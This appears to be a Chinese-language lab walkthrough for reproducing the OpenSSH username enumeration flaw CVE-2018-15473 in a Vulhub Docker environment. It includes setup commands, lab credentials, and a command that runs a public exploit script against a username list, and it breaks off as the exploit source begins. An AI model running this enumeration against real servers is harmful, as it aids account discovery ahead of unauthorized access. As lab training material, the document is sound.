OpenSSH 用户名枚举漏洞(CVE-2018-15473)
Vulnhub官方复现教程
https://vulhub.org/#/environments/openssh/CVE-2018-15473/
漏洞原理
OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。
参考链接:
- http://openwall.com/lists/oss-security/2018/08/15/5
- https://github.com/Rhynorater/CVE-2018-15473-Exploit
- https://www.anquanke.com/post/id/157607
复现过程
启动环境
https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为
cd /root/vulhub/openssh/CVE-2018-15473
搭建及运行漏洞环境:
docker-compose build && docker-compose up -d
用时:2分钟
环境启动后,在客户端执行ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@your-ip -p20022
,输入密码vulhub
,即可登录到容器中。
【注意】把your-ip修改为靶机IP,密码输入不回显
漏洞复现
使用CVE-2018-15473-Exploit,枚举字典中的用户名:
python3 sshUsernameEnumExploit.py --port 20022 --userList exampleInput.txt your-ip
【注意】把your-ip修改为靶机IP
可见,root
、example
、vulhub
、nobody
是存在的用户,rootInvalid
、user
、phithon
是不存在的用户。
CVE-2018-15473-Exploit
#!/usr/bin/env python
###########################################################################
# ____ _____ _____ _ _ #
# / __ \ / ____/ ____